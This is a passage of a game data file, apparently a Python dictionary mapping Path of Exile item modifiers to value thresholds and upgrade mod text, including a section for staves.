"#% reduced Elemental Ailment Duration on you": [(40, '(15 - 20)% reduced Elemental Ailment Duration on you'), (75, '(21 - 35)% reduced Elemental Ailment Duration on you'), (200, '(36 - 50)% reduced Elemental Ailment Duration on you')],
"+# Life gained when you Block": [(150, '(15 - 25) Life gained when you Block'), (250, '(26 - 35) Life gained when you Block'), (500, 'Recover (3 - 5)% of your Maximum Life when you Block')],
"+# Mana gained when you Block": [(50, '(5 - 10) Mana gained when you Block'), (100, '(11 - 15) Mana gained when you Block'), (200, 'Recover (4 - 8)% of your maximum Mana when you Block')],
"+# to Accuracy Rating": [(250, '(10 - 11)% increased Global Accuracy Rating'), (500, '(12 - 13)% increased Global Accuracy Rating'), (750, '(14 - 15)% increased Global Accuracy Rating'), (1000, '(16 - 17)% increased Global Accuracy Rating'), (2000, '(251 - 350) to Accuracy Rating')],
"+# to Armour": [(200, '(15 - 20) to Armour'), (400, '(21 - 30) to Armour'), (600, '(31 - 40) to Armour'), (800, '(41 - 55) to Armour'), (1100, '(56 - 70) to Armour\n2% additional Physical Damage Reduction'), (1450, '(56 - 70) to Armour\n3% additional Physical Damage Reduction'), (2000, '(56 - 70) to Armour\n4% additional Physical Damage Reduction')],
"+# to Armour during Soul Gain Prevention": [(8000, '(21 - 30) to Armour'), (15000, '(31 - 40) to Armour')],
"+# to Dexterity": [(40, '(6 - 8) to Dexterity'), (70, '(9 - 11) to Dexterity'), (100, '(12 - 14) to Dexterity'), (130, '(15 - 17) to Dexterity'), (160, '(18 - 20) to Dexterity'), (200, '6% increased Dexterity\n1 to Maximum Frenzy Charges')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating": [(175, '(15 - 20) to Evasion Rating'), (375, '(21 - 30) to Evasion Rating'), (575, '(31 - 40) to Evasion Rating'), (775, '(41 - 55) to Evasion Rating'), (1050, '(56 - 70) to Evasion Rating\n2 chance to Evade Attacks'), (1400, '(56 - 70) to Evasion Rating\n3 chance to Evade Attacks'), (2000, '(56 - 70) to Evasion Rating\n4 chance to Evade Attacks')],
"+# to Intelligence": [(40, '(6 - 8) to Intelligence'), (70, '(9 - 11) to Intelligence'), (100, '(12 - 14) to Intelligence'), (130, '(15 - 17) to Intelligence'), (160, '(18 - 20) to Intelligence'), (200, '6% increased Intelligence\n1 to Maximum Power Charges')],
"+# to Level of Socketed Chaos Gems": [(3, '(2 - 3) to Quality of Socketed Chaos Gems'), (5, '(4 - 6) to Quality of Socketed Chaos Gems'), (10, '1 to Level of Socketed Chaos Gems')],
"+# to Level of Socketed Cold Gems": [(3, '(2 - 3) to Quality of Socketed Cold Gems'), (5, '(4 - 6) to Quality of Socketed Cold Gems'), (10, '1 to Level of Socketed Cold Gems')],
"+# to Level of Socketed Dexterity Gems": [(1, '(2 - 3) to Quality of Socketed Dexterity Gems'), (2, '(4 - 6) to Quality of Socketed Dexterity Gems'), (5, '1 to Level of Socketed Dexterity Gems')],
"+# to Level of Socketed Fire Gems": [(3, '(2 - 3) to Quality of Socketed Fire Gems'), (5, '(4 - 6) to Quality of Socketed Fire Gems'), (10, '1 to Level of Socketed Fire Gems')],
"+# to Level of Socketed Intelligence Gems": [(1, '(2 - 3) to Quality of Socketed Intelligence Gems'), (2, '(4 - 6) to Quality of Socketed Intelligence Gems'), (5, '1 to Level of Socketed Intelligence Gems')],
"+# to Level of Socketed Lightning Gems": [(3, '(2 - 3) to Quality of Socketed Lightning Gems'), (5, '(4 - 6) to Quality of Socketed Lightning Gems'), (10, '1 to Level of Socketed Lightning Gems')],
"+# to Level of Socketed Melee Gems": [(3, '(2 - 3) to Quality of Socketed Melee Gems'), (5, '(4 - 6) to Quality of Socketed Melee Gems'), (10, '1 to Level of Socketed Melee Gems')],
"+# to Level of Socketed Strength Gems": [(1, '(2 - 3) to Quality of Socketed Strength Gems'), (2, '(4 - 6) to Quality of Socketed Strength Gems'), (5, '1 to Level of Socketed Strength Gems')],
"+# to Level of Socketed Support Gems": [(3, '(2 - 3) to Quality of Socketed Support Gems'), (5, '(4 - 6) to Quality of Socketed Support Gems'), (10, '1 to Level of Socketed Support Gems')],
"+# to Strength": [(40, '(6 - 8) to Strength'), (70, '(9 - 11) to Strength'), (100, '(12 - 14) to Strength'), (130, '(15 - 17) to Strength'), (160, '(18 - 20) to Strength'), (200, '6% increased Strength\n1 to Maximum Endurance Charges')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to all Attributes": [(15, '(6 - 8) to Strength\n(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (30, '(9 - 11) to Strength\n(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (50, '(12 - 14) to Strength\n(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to maximum Energy Shield": [(50, '(8 - 10) to maximum Energy Shield'), (100, '(11 - 14) to maximum Energy Shield'), (150, '(15 - 18) to maximum Energy Shield'), (200, '(19 - 23) to maximum Energy Shield'), (300, '(24 - 30) to maximum Energy Shield\n(0.6 - 0.7)% of Energy Shield Regenerated per second'), (370, '(24 - 30) to maximum Energy Shield\n(0.8 - 0.9)% of Energy Shield Regenerated per second'), (500, '(24 - 30) to maximum Energy Shield\n1.0% of Energy Shield Regenerated per second')],
"+# to maximum Life": [(100, '(8 - 10) to maximum Life'), (175, '(11 - 14) to maximum Life'), (250, '(15 - 19) to maximum Life'), (325, '(20 - 24) to maximum Life'), (400, '(25 - 30) to maximum Life\n4% increased maximum Life'), (1000, '(5 - 6)% increased maximum Life')],
"+# to maximum Mana": [(50, '(8 - 10) to maximum Mana'), (100, '(11 - 14) to maximum Mana'), (150, '(15 - 19) to maximum Mana'), (175, '(20 - 24) to maximum Mana'), (200, '(7 - 8)% increased maximum Mana\n(6 - 8)% increased Attack Damage per 500 Maximum Mana\n(6 - 8)% increased Spell Damage per 500 Maximum Mana'), (500, '(7 - 8)% increased maximum Mana')],
"+#% Chance to Block": [(28, '(2 - 3) Chance to Block Attack Damage'), (50, '(4 - 5) Chance to Block Attack Damage')],
"+#% Chance to Block Projectile Attack Damage": [(28, '(2 - 3) Chance to Block Attack Damage\n(2 - 3)% Chance to Block Spell Damage'), (50, '(4 - 5) Chance to Block Attack Damage\n(4 - 5)% Chance to Block Spell Damage')],
"+#% to Chaos Resistance": [(35, '(5 - 6) to Chaos Resistance'), (70, '(7 - 8) to Chaos Resistance'), (100, '(9 - 10) to Chaos Resistance'), (120, '(9 - 10) to Chaos Resistance\n2 to maximum Chaos Resistance')],
"+#% to Cold Resistance": [(50, '8 to Cold Resistance'), (75, '(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Cold Resistance'), (125, '(13 - 14) to Cold Resistance'), (140, '(15 - 16) to Cold Resistance'), (150, '(15 - 16) to Cold Resistance\n3 to maximum Cold Resistance')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '8 to Fire Resistance'), (75, '(9 - 10) to Fire Resistance'), (100, '(11 - 12) to Fire Resistance'), (125, '(13 - 14) to Fire Resistance'), (140, '(15 - 16) to Fire Resistance'), (150, '(15 - 16) to Fire Resistance\n3 to maximum Fire Resistance')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Lightning Resistance": [(50, '8 to Lightning Resistance'), (75, '(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Lightning Resistance'), (125, '(13 - 14) to Lightning Resistance'), (140, '(15 - 16) to Lightning Resistance'), (150, '(15 - 16) to Lightning Resistance\n3 to maximum Lightning Resistance')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Quality of Socketed Gems": [(20, '(2 - 3) to Quality of Socketed Gems'), (50, '(4 - 6) to Quality of Socketed Gems')],
"+#% to all Elemental Resistances": [(15, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance'), (30, '(13 - 14) to Fire Resistance\n(13 - 14) to Cold Resistance\n(13 - 14) to Lightning Resistance'), (45, '(15 - 16) to Fire Resistance\n(15 - 16) to Cold Resistance\n(15 - 16) to Lightning Resistance'), (100, '(15 - 16) to Fire Resistance\n(15 - 16) to Cold Resistance\n(15 - 16) to Lightning Resistance\n2 to all maximum Resistances')],
"Adds # to # Cold Damage": [(20, '8% increased Cold Damage'), (40, '(9 - 10)% increased Cold Damage'), (100, '(11 - 12)% increased Cold Damage')],
"Adds # to # Fire Damage": [(20, '8% increased Fire Damage'), (40, '(9 - 10)% increased Fire Damage'), (100, '(11 - 12)% increased Fire Damage')],
"Adds # to # Fire Damage if you've Blocked Recently": [(90, '(18 - 20)% increased Fire Damage'), (170, '(21 - 23)% increased Fire Damage'), (500, '(24 - 26)% increased Fire Damage')],
"Adds # to # Lightning Damage": [(35, '8% increased Lightning Damage'), (65, '(9 - 10)% increased Lightning Damage'), (100, '(11 - 12)% increased Lightning Damage')],
"Chill Nearby Enemies when you Block": [(0.0, '(7 - 10)% increased Effect of Chill'), (0.01, '(11 - 15)% increased Effect of Chill')],
"Minions have #% increased maximum Life": [(40, 'Minions have (7 - 9)% increased maximum Life'), (80, 'Minions have (10 - 12)% increased maximum Life'), (150, 'Minions have (13 - 15)% increased maximum Life')],
"Recover #% of your maximum Mana when you Block": [(3, '(5 - 10) Mana gained when you Block'), (5, '(11 - 15) Mana gained when you Block'), (10, 'Recover (4 - 8)% of your maximum Mana when you Block')],
"Reflects # Physical Damage to Melee Attackers": [(300, 'Reflects (10 - 15) Physical Damage to Melee Attackers'), (450, 'Reflects (16 - 40) Physical Damage to Melee Attackers'), (550, 'Reflects (41 - 80) Physical Damage to Melee Attackers'), (1000, 'Reflects (41 - 80) Physical Damage to Melee Attackers\n(19 - 20) to Global Critical Strike Multiplier')],
"Socketed Attacks have +# to Total Mana Cost": [(20, '-1 to Total Mana Cost of Skills'), (40, '-2 to Total Mana Cost of Skills'), (50, '-3 to Total Mana Cost of Skills')],
"Socketed Spells have #% reduced Mana Cost": [(25, '2% reduced Mana Cost of Skills'), (50, '3% reduced Mana Cost of Skills'), (100, '(4 - 5)% reduced Mana Cost of Skills')],
},
"Staff": {
"#% chance for Bleeding inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Bleeding'), (140, '(19 - 23)% increased Damage with Bleeding'), (500, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (30 - 35)% faster')],
"#% chance for Poisons inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Poison'), (140, '(19 - 23)% increased Damage with Poison'), (500, '(24 - 28)% increased Damage with Poison\nPoisons you inflict deal Damage (30 - 35)% faster')],
"#% chance to Cast Level 20 Fire Burst on Hit": [(11, '(33 - 36)% increased Fire Damage'), (22, '(37 - 40)% increased Fire Damage'), (50, '(41 - 44)% increased Fire Damage')],
"#% chance to Ignite": [(60, '(9 - 10)% chance to Ignite'), (90, '(11 - 12)% chance to Ignite'), (200, '(13 - 15)% chance to Ignite\n(12 - 15)% increased Ignite Duration on Enemies')],
"#% chance to Intimidate Enemies for 4 seconds on Hit": [(16, '(4 - 5)% chance to Intimidate Enemies for 4 seconds on Hit'), (32, '(6 - 7)% chance to Intimidate Enemies for 4 seconds on Hit'), (100, '(8 - 10)% chance to Intimidate Enemies for 4 seconds on Hit')],
"#% chance to Shock": [(60, '(9 - 10)% chance to Shock'), (90, '(11 - 12)% chance to Shock'), (200, '(13 - 15)% chance to Shock\n(12 - 15)% increased Shock Duration on Enemies')],
"#% chance to Trigger a Socketed Spell when you Use a Skill": [(250, 'Triggered Spells deal (27 - 32)% increased Spell Damage'), (500, 'Triggered Spells deal (33 - 38)% increased Spell Damage')],
"#% chance to deal Double Damage": [(18, '4% chance to deal Double Damage'), (50, '5% chance to deal Double Damage')],
"#% chance to deal Double Damage while Focussed": [(90, '(29 - 35)% increased Attack Damage\n(29 - 35)% increased Spell Damage'), (200, '(36 - 44)% increased Attack Damage\n(36 - 44)% increased Spell Damage')],
"#% chance to gain Onslaught for 4 seconds on Kill": [(44, '(3 - 4)% increased Attack Speed\n(11 - 12)% increased Cast Speed'), (100, '(5 - 6)% increased Attack Speed\n(13 - 15)% increased Cast Speed')],
"#% chance to gain a Power, Frenzy or Endurance Charge on Kill": [(18, '(8 - 11)% increased Endurance Charge Duration\n(8 - 11)% increased Frenzy Charge Duration\n(8 - 11)% increased Power Charge Duration'), (36, '(12 - 15)% increased Endurance Charge Duration\n(12 - 15)% increased Frenzy Charge Duration\n(12 - 15)% increased Power Charge Duration'), (100, '(5 - 10)% chance to gain an Endurance Charge on Kill\n(5 - 10)% chance to gain a Frenzy Charge on Kill\n(5 - 10)% chance to gain a Power Charge on Kill')],
"#% increased Attack Speed": [(30, '(3 - 4)% increased Attack Speed'), (50, '(5 - 6)% increased Attack Speed'), (100, '(7 - 8)% increased Attack Speed')],
"#% increased Attack Speed while a Rare or Unique Enemy is Nearby": [(56, '(3 - 4)% increased Attack Speed'), (100, '(5 - 6)% increased Attack Speed')],
"#% increased Burning Damage": [(70, '(22 - 27)% increased Burning Damage'), (130, '(28 - 35)% increased Burning Damage'), (500, '(36 - 44)% increased Burning Damage\nIgnites you inflict deal Damage (30 - 35)% faster')],
"#% increased Cast Speed": [(50, '(11 - 12)% increased Cast Speed'), (100, '(13 - 15)% increased Cast Speed'), (200, '(16 - 18)% increased Cast Speed')],
"#% increased Chaos Damage": [(110, '(29 - 32)% increased Chaos Damage'), (220, '(33 - 36)% increased Chaos Damage'), (500, '(37 - 40)% increased Chaos Damage')],
"#% increased Cold Damage": [(100, '(29 - 32)% increased Cold Damage'), (200, '(33 - 36)% increased Cold Damage'), (300, '(37 - 40)% increased Cold Damage'), (350, '(41 - 44)% increased Cold Damage'), (1000, '(20 - 30)% increased Frostbite Curse Effect')],
"#% increased Critical Strike Chance": [(25, '(5 - 6)% increased Critical Strike Chance'), (50, '(7 - 8)% increased Critical Strike Chance'), (75, '(9 - 10)% increased Critical Strike Chance'), (100, '(11 - 12)% increased Critical Strike Chance'), (200, '(13 - 15)% increased Critical Strike Chance')],
"#% increased Critical Strike Chance for Spells": [(100, '(29 - 31)% increased Critical Strike Chance for Spells'), (175, '(32 - 34)% increased Critical Strike Chance for Spells'), (250, '(35 - 37)% increased Critical Strike Chance for Spells'), (325, '(38 - 41)% increased Critical Strike Chance for Spells'), (500, '(42 - 45)% increased Critical Strike Chance for Spells')],
"#% increased Damage per Endurance Charge": [(16, '2% increased Damage per Endurance Charge'), (50, '(4 - 5)% increased Damage per Endurance Charge')],
"#% increased Damage per Frenzy Charge": [(16, '2% increased Damage per Frenzy Charge'), (50, '(4 - 5)% increased Damage per Frenzy Charge')],
"#% increased Damage per Power Charge": [(16, '2% increased Damage per Power Charge'), (50, '(4 - 5)% increased Damage per Power Charge')],
"#% increased Damage when on Full Life": [(130, '(21 - 26)% increased Damage'), (260, '(27 - 32)% increased Damage'), (500, '(33 - 38)% increased Damage')],
"#% increased Elemental Damage": [(130, '(21 - 26)% increased Elemental Damage'), (260, '(27 - 32)% increased Elemental Damage'), (500, '(33 - 38)% increased Elemental Damage\nDamage Penetrates (3 - 5)% Elemental Resistances')],
"#% increased Elemental Damage with Attack Skills": [(50, 'Attacks with this Weapon Penetrate 2% Elemental Resistances'), (100, 'Attacks with this Weapon Penetrate 3% Elemental Resistances'), (300, 'Attacks with this Weapon Penetrate (4 - 5)% Elemental Resistances')],
"#% increased Fire Damage": [(100, '(29 - 32)% increased Fire Damage'), (200, '(33 - 36)% increased Fire Damage'), (300, '(37 - 40)% increased Fire Damage'), (350, '(41 - 44)% increased Fire Damage'), (1000, '(20 - 30)% increased Flammability Curse Effect')],
"#% increased Light Radius": [(20, '10% increased Light Radius'), (30, '12% increased Light Radius'), (35, '15% increased Light Radius'), (100, '15% increased Light Radius\nKilled Enemies Explode, dealing 5% of their Life as Physical Damage')],
"#% increased Lightning Damage": [(100, '(29 - 32)% increased Lightning Damage'), (200, '(33 - 36)% increased Lightning Damage'), (300, '(37 - 40)% increased Lightning Damage'), (350, '(41 - 44)% increased Lightning Damage'), (1000, '(20 - 30)% increased Conductivity Curse Effect')],
"#% increased Mana Regeneration Rate": [(50, '(16 - 18)% increased Mana Regeneration Rate'), (90, '(19 - 21)% increased Mana Regeneration Rate'), (130, '(22 - 24)% increased Mana Regeneration Rate'), (170, '(25 - 27)% increased Mana Regeneration Rate'), (190, '(28 - 30)% increased Mana Regeneration Rate'), (500, '(28 - 30)% increased Mana Regeneration Rate\n0.6% of Mana Regenerated per second')],
"#% increased Physical Damage": [(200, '(13 - 14)% increased Physical Damage'), (400, '(15 - 16)% increased Physical Damage'), (600, '(17 - 19)% increased Physical Damage'), (725, '(20 - 22)% increased Physical Damage'), (1000, '(23 - 25)% increased Physical Damage')],
"#% increased Spell Damage": [(125, '(22 - 24)% increased Spell Damage'), (250, '(25 - 28)% increased Spell Damage'), (375, '(29 - 35)% increased Spell Damage'), (420, '(45 - 51)% increased Spell Damage'), (1000, 'Spells have a (16 - 18)% chance to deal Double Damage')],
"#% increased Stun Duration on Enemies": [(50, '(15 - 17)% increased Stun Duration on Enemies'), (300, '(26 - 35)% increased Stun Duration on Enemies')],
"#% of Energy Shield Regenerated per second if you've Hit an Enemy Recently": [(1.17, '(7 - 9)% increased maximum Energy Shield'), (2.33, '(10 - 13)% increased maximum Energy Shield'), (8.33, '(14 - 16)% increased maximum Energy Shield')],
"#% of Mana Regenerated per second if you've Hit an Enemy Recently": [(0.42, '(22 - 24)% increased Mana Regeneration Rate'), (0.83, '(25 - 27)% increased Mana Regeneration Rate'), (1.67, '(28 - 30)% increased Mana Regeneration Rate\n0.4% of Mana Regenerated per second')],
"#% of Physical Attack Damage Leeched as Life": [(0.4, '0.2% of Physical Attack Damage Leeched as Life'), (0.7, '0.3% of Physical Attack Damage Leeched as Life'), (1.0, '0.4% of Physical Attack Damage Leeched as Life'), (4.0, '3.0% of Physical Attack Damage Leeched as Life')],
"#% of Physical Attack Damage Leeched as Mana": [(0.4, '0.1% of Physical Attack Damage Leeched as Mana'), (0.7, '0.2% of Physical Attack Damage Leeched as Mana'), (1.0, '0.3% of Physical Attack Damage Leeched as Mana'), (4.0, '1.0% of Physical Attack Damage Leeched as Mana')],
"#% reduced Attribute Requirements": [(60, '(6 - 7) to all Attributes'), (70, '(8 - 9) to all Attributes'), (85, '(10 - 12) to all Attributes'), (100, '1 to Maximum Endurance Charges'), (100, '1 to Maximum Power Charges')],
"#% reduced Enemy Stun Threshold": [(30, '(5 - 6)% reduced Enemy Stun Threshold'), (35, '(7 - 8)% reduced Enemy Stun Threshold'), (200, '(9 - 10)% reduced Enemy Stun Threshold')],
"#% reduced Soul Cost of Vaal Skills": [(55, 'Vaal Skills deal (36 - 44)% increased Damage'), (110, 'Vaal Skills deal (45 - 51)% increased Damage'), (200, '(60 - 70)% increased Attack Damage if Corrupted\n(60 - 70)% increased Spell Damage if Corrupted')],
"+# Life gained for each Enemy hit by your Attacks": [(4, '(4 - 5) Life gained for each Enemy hit by your Attacks'), (7, '(6 - 8) Life gained for each Enemy hit by your Attacks'), (10, '(9 - 15) Life gained for each Enemy hit by your Attacks'), (15, '(45 - 50) Life gained for each Enemy hit by your Attacks')],
"+# to Accuracy Rating": [(500, '(10 - 15)% increased Global Accuracy Rating'), (1000, '(20 - 25)% increased Global Accuracy Rating'), (2000, '(30 - 35)% increased Global Accuracy Rating')],
"+# to Armour if you've Hit an Enemy Recently": [(1100, '(14 - 16)% increased Armour'), (2200, '(17 - 19)% increased Armour'), (5000, '(20 - 22)% increased Armour')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating if Hit an Enemy Recently": [(1100, '(14 - 16)% increased Evasion Rating'), (2200, '(17 - 19)% increased Evasion Rating'), (5000, '(20 - 22)% increased Evasion Rating')],
"+# to Intelligence": [(40, '(6 - 8) to Intelligence'), (70, '(9 - 11) to Intelligence'), (100, '(12 - 14) to Intelligence'), (130, '(15 - 17) to Intelligence'), (160, '(18 - 20) to Intelligence'), (200, 'Adds 1 to (7 - 8) Lightning Damage to Attacks with this Weapon per 10 Intelligence'), (200, '1% increased Spell Damage per 10 Intelligence')],
"+# to Level of Socketed Chaos Gems": [(3, '(2 - 3) to Quality of Socketed Chaos Gems'), (5, '(4 - 6) to Quality of Socketed Chaos Gems'), (10, '1 to Level of Socketed Chaos Gems')],
"+# to Level of Socketed Cold Gems": [(3, '(2 - 3) to Quality of Socketed Cold Gems'), (5, '(4 - 6) to Quality of Socketed Cold Gems'), (10, '1 to Level of Socketed Cold Gems')],
"+# to Level of Socketed Dexterity Gems": [(1, '(2 - 3) to Quality of Socketed Dexterity Gems'), (2, '(4 - 6) to Quality of Socketed Dexterity Gems'), (5, '1 to Level of Socketed Dexterity Gems')],
"+# to Level of Socketed Fire Gems": [(3, '(2 - 3) to Quality of Socketed Fire Gems'), (5, '(4 - 6) to Quality of Socketed Fire Gems'), (10, '1 to Level of Socketed Fire Gems')],
"+# to Level of Socketed Gems": [(1, '(2 - 3) to Quality of Socketed Gems'), (2, '(4 - 6) to Quality of Socketed Gems'), (10, '1 to Level of Socketed Gems')],
"+# to Level of Socketed Intelligence Gems": [(1, '(2 - 3) to Quality of Socketed Intelligence Gems'), (2, '(4 - 6) to Quality of Socketed Intelligence Gems'), (5, '1 to Level of Socketed Intelligence Gems')],
"+# to Level of Socketed Lightning Gems": [(3, '(2 - 3) to Quality of Socketed Lightning Gems'), (5, '(4 - 6) to Quality of Socketed Lightning Gems'), (10, '1 to Level of Socketed Lightning Gems')],
"+# to Level of Socketed Melee Gems": [(3, '(2 - 3) to Quality of Socketed Melee Gems'), (5, '(4 - 6) to Quality of Socketed Melee Gems'), (10, '1 to Level of Socketed Melee Gems')],
"+# to Level of Socketed Strength Gems": [(1, '(2 - 3) to Quality of Socketed Strength Gems'), (2, '(4 - 6) to Quality of Socketed Strength Gems'), (5, '1 to Level of Socketed Strength Gems')],
"+# to Level of Socketed Support Gems": [(3, '(2 - 3) to Quality of Socketed Support Gems'), (5, '(4 - 6) to Quality of Socketed Support Gems'), (10, '1 to Level of Socketed Support Gems')],
"+# to Strength": [(40, '(6 - 8) to Strength'), (70, '(9 - 11) to Strength'), (100, '(12 - 14) to Strength'), (130, '(15 - 17) to Strength'), (160, '(18 - 20) to Strength'), (200, 'Adds (2 - 3) to (4 - 5) Fire Damage to Attacks with this Weapon per 10 Strength'), (200, '1% increased Spell Damage per 10 Strength')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to Weapon range": [(7, '1 to Weapon range'), (20, '2 to Weapon range')],
"+# to all Attributes": [(15, '(6 - 8) to Strength\n(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (30, '(9 - 11) to Strength\n(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (50, '(12 - 14) to Strength\n(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to maximum Mana": [(70, '(8 - 10) to maximum Mana'), (125, '(11 - 14) to maximum Mana'), (175, '(15 - 19) to maximum Mana'), (230, '(20 - 24) to maximum Mana'), (280, '(25 - 30) to maximum Mana'), (500, '(12 - 14)% increased Attack Damage per 500 Maximum Mana\n(12 - 14)% increased Spell Damage per 500 Maximum Mana')],
"+#% Critical Strike Multiplier while a Rare or Unique Enemy is Nearby": [(60, '(18 - 20) to Global Critical Strike Multiplier'), (120, '(21 - 23) to Global Critical Strike Multiplier'), (150, '(24 - 26) to Global Critical Strike Multiplier')],
"+#% to Chaos Resistance": [(35, '(5 - 6) to Chaos Resistance'), (70, '(7 - 8) to Chaos Resistance'), (120, '(9 - 10) to Chaos Resistance')],
"+#% to Cold Damage over Time Multiplier": [(100, '(21 - 23) to Cold Damage over Time Multiplier'), (200, '(24 - 26) to Cold Damage over Time Multiplier'), (500, '(27 - 30) to Cold Damage over Time Multiplier')],
"+#% to Cold Resistance": [(50, '8 to Cold Resistance'), (75, '(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Cold Resistance'), (125, '(13 - 14) to Cold Resistance'), (150, '(15 - 16) to Cold Resistance')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '8 to Fire Resistance'), (75, '(9 - 10) to Fire Resistance'), (100, '(11 - 12) to Fire Resistance'), (125, '(13 - 14) to Fire Resistance'), (150, '(15 - 16) to Fire Resistance')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Global Critical Strike Multiplier": [(25, '(15 - 17) to Global Critical Strike Multiplier'), (50, '(18 - 20) to Global Critical Strike Multiplier'), (75, '(21 - 23) to Global Critical Strike Multiplier'), (100, '(24 - 26) to Global Critical Strike Multiplier'), (200, '(27 - 30) to Global Critical Strike Multiplier')],
"+#% to Lightning Resistance": [(50, '8 to Lightning Resistance'), (75, '(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Lightning Resistance'), (125, '(13 - 14) to Lightning Resistance'), (150, '(15 - 16) to Lightning Resistance')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Non-Ailment Chaos Damage over Time Multiplier": [(100, '(21 - 23) to Non-Ailment Chaos Damage over Time Multiplier'), (200, '(24 - 26) to Non-Ailment Chaos Damage over Time Multiplier'), (500, '(27 - 30) to Non-Ailment Chaos Damage over Time Multiplier')],
"+#% to Quality of Socketed Gems": [(20, '(2 - 3) to Quality of Socketed Gems'), (50, '(4 - 6) to Quality of Socketed Gems')],
"Adds # to # Chaos Damage": [(300, 'Adds (7 - 12) to (15 - 26) Chaos Damage'), (450, 'Adds (13 - 21) to (27 - 49) Chaos Damage'), (1000, 'Adds (22 - 43) to (50 - 74) Chaos Damage')],
"Adds # to # Cold Damage": [(120, 'Adds (5 - 8) to (11 - 18) Cold Damage'), (240, 'Adds (9 - 15) to (19 - 28) Cold Damage'), (300, 'Adds (16 - 22) to (29 - 39) Cold Damage'), (360, 'Adds (23 - 30) to (40 - 53) Cold Damage'), (1000, 'Adds (31 - 37) to (44 - 65) Cold Damage')],
